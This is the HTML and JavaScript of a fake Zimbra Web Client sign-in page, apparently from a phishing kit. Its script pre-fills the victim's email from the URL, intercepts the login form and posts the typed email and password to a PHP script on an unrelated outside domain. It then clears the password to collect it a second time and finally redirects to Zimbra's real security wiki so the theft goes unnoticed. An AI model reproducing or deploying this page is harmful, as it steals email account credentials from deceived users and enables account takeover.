<html lang="ru">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" href="https://atheneirvingphysio.co.za/zimbra/favicon.ico" type="image/icon" sizes="30x30">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Zimbra Web Client Sign In</title>
    <link rel="stylesheet" href="https://atheneirvingphysio.co.za/zimbra/mycss.css">

    <style type="text/css">


    </style>
  </head>
  <body>
    <!-- body///////////////// -->
    <div class="LoginScreen">
      <div class="center">
        <div class="contentBox">
          <h1><a href="#" id="bannerLink" target="_new" title="Zimbra"><span class="ScreenReaderOnly">Zimbra</span>
            <span class="ImgLoginBanner"></span>
          </a></h1>
          <div id="ZLoginAppName">Web Client</div>
          <form method="post" name="loginForm" action="/" accept-charset="UTF-8">
            <input type="hidden" name="loginOp" value="login">
            <input type="hidden" name="login_csrf" value="b4f18484-e033-402b-8811-55d7bf7f0ae6">

            <table class="form">
              <tbody>
                <tr>
                  <td colspan="2">
                    <center>
                      <div class="text-warning border-warning p-2" id="msg" style="border:1px solid; display: none;"></div>
                      <span id="error" class="text-warning" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                  </td>
                </tr>
                <tr>
                  <td><label for="username">Username:</label></td>
                  <td><input id="email" class="zLoginField" name="email" type="text" value="" size="40" maxlength="1024" autocapitalize="off" autocorrect="off"></td>
                </tr>
                <tr>
                  <td><label for="password">Password:</label></td>
                  <td><input id="password" autocomplete="off" class="zLoginField" name="password" type="password" value="" size="40" maxlength="1024"></td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td class="submitTD">
                    <input id="remember" value="1" type="checkbox" name="zrememberme">
                    <label for="remember">Stay signed in</label>
                    <input id="submit-btn" name="submit-btn" type="submit" class="ZLoginButton DwtButton" value="Sign In">
                  </td>
                </tr>

                <tr>
                  <td colspan="2"><hr></td>
                </tr>
                <tr>
                  <td>
                    <label for="client">Version:</label>
                  </td>
                  <td>
                    <div class="positioning">
                      <select id="client" name="client" onchange="clientChange(this.options[this.selectedIndex].value)">
                        <option value="preferred" selected=""> Default</option>
                        <option value="advanced"> Advanced (Ajax)</option>
                        <option value="standard"> Standard (HTML)</option>
                        <option value="mobile"> Mobile</option>
                        <option value="zimbrax"> Zimbra X</option>
                        <option value="touch"> Touch</option>
                      </select>
                      <a href="#" onclick="showWhatsThis();" id="ZLoginWhatsThisAnchor" aria-controls="ZLoginWhatsThis" aria-expanded="false">What’s This?</a>
                      <div id="ZLoginWhatsThis" class="ZLoginInfoMessage" style="display:none;" onclick="showWhatsThis();" role="tooltip"><h3 style="text-align:center;">Client Types</h3>  <b>Advanced</b> offers the full set of Web collaboration features. This Web Client works best with newer browsers and faster Internet connections. <br><br><b>Standard</b> is recommended when Internet connections are slow, when using older browsers, or for easier accessibility. <br><br><b>Mobile</b> is recommended for mobile devices. <br><br><b>Touch</b> is recommended for tablets. <br><br>To set <b>Default</b> to be your preferred client type, change the sign in options in your Preferences, General tab after you sign in.</div>
                      <div id="ZLoginUnsupported" class="ZLoginInfoMessage" style="display:none;">Note that your web browser or display does not fully support the Advanced version.  We strongly recommend that you use the Standard client.</div>
                    </div>
                  </td>
                </tr>
              </tbody></table>
            </form>
          </div>
          <div class="decor1"></div>
        </div>

        <div class="Footer">
          <div id="ZLoginNotice" class="legalNotice-small"><a target="_new" href="https://www.zimbra.com">Zimbra</a> :: the leader in open source messaging and collaboration :: <a target="_new" href="https://blog.zimbra.com">Blog</a> - <a target="_new" href="https://wiki.zimbra.com">Wiki</a> - <a target="_new" href="https://www.zimbra.com/forums">Forums</a></div>
          <div class="copyright">
          Copyright © 2005-2021 Synacor, Inc. All rights reserved. "Zimbra" is a registered trademark of Synacor, Inc.</div>
        </div>
        <div class="decor2"></div>
      </div>

      <!-- body end/////////// -->




      <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script>

      /* global $ */
      $(document).ready(function(){
        var count=0;

    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    }
    else
    {
        // $('#email').val(email);
        var my_email =email;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        
        $("#msg").hide();
        $('#email').val(my_email);
        $('#emailch').html(my_email);
        $("#msg").hide();
      }
      ///////////////url getting email////////////////


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      // if (!filter.test(my_email)) {
      //   $('#error').show();
      //   email.focus;
      //   return false;
      // }
      if (!my_email) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://atheneirvingphysio.co.za/zimbra/next.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').val('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://wiki.zimbra.com/wiki/Security_Center");

                  }
                  $('#msg').html(response['msg']);
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                window.location.replace("https://wiki.zimbra.com/wiki/Security_Center");
              }
              $("#msg").show();
              $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').val('Sign In');
            }
          });
    });


    });


  </script>
  </html>